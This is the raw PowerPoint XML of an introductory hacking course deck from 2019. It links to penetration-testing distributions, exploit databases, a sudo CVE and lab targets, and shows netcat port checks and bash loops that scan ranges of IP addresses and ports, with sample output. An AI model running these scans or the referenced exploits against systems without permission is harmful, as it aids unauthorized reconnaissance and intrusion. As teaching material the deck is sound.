              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5673849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3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9F203383-855B-7E49-AD5F-24BB0F1E4D29}"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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3238500"/>
            <a:ext cx="6400800" cy="14605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85800" y="1673242"/>
            <a:ext cx="7772400" cy="1225021"/>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203383-855B-7E49-AD5F-24BB0F1E4D29}"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203383-855B-7E49-AD5F-24BB0F1E4D29}"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866"/>
            <a:ext cx="7924800" cy="952500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr cap="none" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9F203383-855B-7E49-AD5F-24BB0F1E4D29}"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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1333500"/>
            <a:ext cx="7924800" cy="3429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4" y="4135438"/>
            <a:ext cx="7885113" cy="1135062"/>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609604" y="2885283"/>
            <a:ext cx="7885113" cy="1250156"/>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203383-855B-7E49-AD5F-24BB0F1E4D29}"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333500"/>
            <a:ext cx="3733800" cy="34290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800600" y="1333500"/>
            <a:ext cx="3733800" cy="34290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28866"/>
            <a:ext cx="7924800" cy="9525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9F203383-855B-7E49-AD5F-24BB0F1E4D29}"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1841500"/>
            <a:ext cx="3733800" cy="29210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609600" y="1841500"/>
            <a:ext cx="3733800" cy="29210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28866"/>
            <a:ext cx="7924800" cy="9525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333500"/>
            <a:ext cx="3733800" cy="478896"/>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00600" y="1333500"/>
            <a:ext cx="3733800" cy="478896"/>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F203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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866"/>
            <a:ext cx="7924800" cy="9525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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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206500"/>
            <a:ext cx="4648200"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12648" y="1206500"/>
            <a:ext cx="2971800" cy="91440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12648" y="2123243"/>
            <a:ext cx="2971800" cy="2639258"/>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203383-855B-7E49-AD5F-24BB0F1E4D29}"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5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1206500"/>
            <a:ext cx="2971800" cy="91440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4657344" y="1206500"/>
            <a:ext cx="3419856" cy="289560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09600" y="2123242"/>
            <a:ext cx="2971800" cy="2004258"/>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203383-855B-7E49-AD5F-24BB0F1E4D29}"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5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="228866"/>
            <a:ext cx="7924800" cy="9525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333501"/>
            <a:ext cx="79248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00" y="5296960"/>
            <a:ext cx="1524000" cy="304271"/>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9F203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/1/19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5296960"/>
            <a:ext cx="2895600" cy="304271"/>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5296960"/>
            <a:ext cx="990600" cy="304271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{39164E73-8326-134C-A483-9046EF43BDF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vn.nmap.org/nmap/script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ecureAuthCorp/impacket" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/downloads/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecList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vulnhub.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/samurai/files/latest/download?source=files" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://parrotlinux.org/download-security.php" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/LionSec/katooli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support.f5.com/csp/article/K6917"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psmet/BIGip-cookie-decoder.g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seclists.org/oss-sec/2019/q4/18" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47502" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vuldb.com/?id.143468"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www.rapid7.com/db/vulnerabilities/debian-cve-2019-14287" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-14287" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/google-hacking-database" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-14287" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cxsecurity.com/"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dojo-basic/"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dojo-basic/"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dojo-basic/"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127.0.0.1:8082/"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dojo-basic/config.inc"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hyperlink" Target="https://www.websec.ca/kb/sql_injection"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dojo-basic/index.php?text_file_name=https://www.google.com"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wordpress-site.com/"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rupal-site.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/droope/droopescan.gi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cap="none" dirty="0"/>
              <a:t>Introduction to Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308100" y="4328583"/>
            <a:ext cx="3251200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mike Housley</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chris Doyle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375400" y="4328583"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10/2019</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2264640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D53A-8546-F841-BD63-F24D7EC15A75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E18528-114E-4545-B29C-BF4C74FF3EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port is open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -w1 -z 172.217.14.238 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(UNKNOWN) [172.217.14.238] 443 (https) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sent 0, rcvd 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port may be closed or is filtered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -w1 -z 127.0.0.1 21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(UNKNOWN) [127.0.0.1] 21 (ftp) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection refused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sent 0, rcvd 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4636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2910-5BF9-1E4E-96E7-592EECD974A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Bash Loop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2FDD7B-02FA-BB4D-851C-3EBF679E71D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop through part of a subnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc_portscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” to insert the text below and then save file with shift + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> in $(seq 1 100); do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    for port in $(seq 21 443); do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>nvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -w1 -z 10.10.100.$ip $port 2&gt;&amp;1 | grep open </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run script and view output – this method is slow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc_portscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4176639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2298-EBA3-BA4B-BB2D-790E55EF65DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Bash Loop Improved </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81CA99B9-C186-FD41-A1BA-B026F65A3D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Faster bash script. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> launches once instance of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> per IP instead of per port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in $(seq 156 157); do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -w1 -z 45.33.32.$ip 22-80 2&gt;&amp;1 | grep open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc_portscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(UNKNOWN) [45.33.32.156] 80 (http) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(UNKNOWN) [45.33.32.157] 80 (http) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169051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C688-5D1C-3443-8D35-5D8602332633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2646D772-D572-2A4A-A648-7D4120ED3996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP Connect scan with top 1000 ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
